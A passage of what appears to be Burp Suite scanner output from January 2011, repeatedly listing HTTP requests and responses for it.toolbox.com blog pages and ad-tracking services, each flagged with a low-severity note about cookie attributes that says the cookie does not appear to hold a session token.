sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000080p010504108ag2leqh190vft400f0p01050410f82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00i0p01050410h5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000040p010504104820lebnns181qq00e0l000400100b0olfjpei000000040p010504104ab4lebnns181qq00i0p01050410h9szlebnns181qq00i0p01050410h8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b15fs200h0p01050410hal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000040p010504104b08lfjpei000000040p01050410440slebnns181qq00e0l00040010045mlfdxmc000000050p010504105a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1b9mx00j0q01050510i; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: rdrlst=2100so2ylebnns0000000j0q01050510i7dpletz4d0000000f0q01050510f10flfk1rn000000040q010504104mmnlebnns0000000j0q01050510i10elfk1rn000000040q01050410410rlfmxap000000010q010501101x1blebnns0000000j0q01050510ixo1lebnns0000000j0q01050510ieh5lf17qf0000000b0q01050510b6bylemlne0000000h0q01050510hw3clebnns0000000j0q01050510i7gmlebnns0000000j0q01050510ijv6lebnns0000000j0q01050510ij4ilew2e20000000d0q01050510dxthlebnns0000000j0q01050510ifullf8gij000000070q0105051070c9lfk1rn000000040q010504104jillebnns0000000j0q01050510ifuqlegh2b0000000i0q01050510ib6mlf17qk0000000a0q01050510amz1lebnns0000000j0q01050510icajlfk1rn000000040q010504104p7vlebnns0000000j0q01050510i7vglfk1rn000000040q010504104xvslebnns0000000j0q01050510i10rlfjpei000000050q010505105xuklebnns0000000j0q01050510ijk7lebnns0000000j0q01050510ix1jlebnns0000000j0q01050510iyiplebnns0000000j0q01050510icbnlfk1rn000000040q010504104xwflebnns0000000j0q01050510iyh0lebnns0000000j0q01050510ie4vlebnns0000000j0q01050510ixwblebnns0000000j0q01050510ijwblfk1rn000000040q010504104; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000090q01050510982gletz4d0pqa500a0l000400100ag2leqh190wg9g00g0q01050510g82hlebnns181qq00j0q01050510i9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000050q010505105820lebnns181qq00e0l000400100b0olfjpei000000050q010505105ab4lebnns181qq00j0q01050510i9szlebnns181qq00j0q01050510i8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b16g8e00i0q01050510ial1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000050q0105051058bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000050q01050510540slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000060q01050510640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days Content-Length: 0 Date: Wed, 26 Jan 2011 14:52:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/it.toolbox.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847&ref=http%3A%2F%2Fburp%2Fshow%2F4&1yua7sg HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 274 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 26 Jan 2011 14:52:01 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 25 Feb 2011 14:52:01 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296053521.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 25-Jan-2013 14:47:11 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 26 Jan 2011 14:52:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 26 Jan 2011 14:52:01 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68764 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67441 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70278 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72957 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72699 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68279 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66943 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73552 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85703 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 75502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69302 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68773 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69404 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
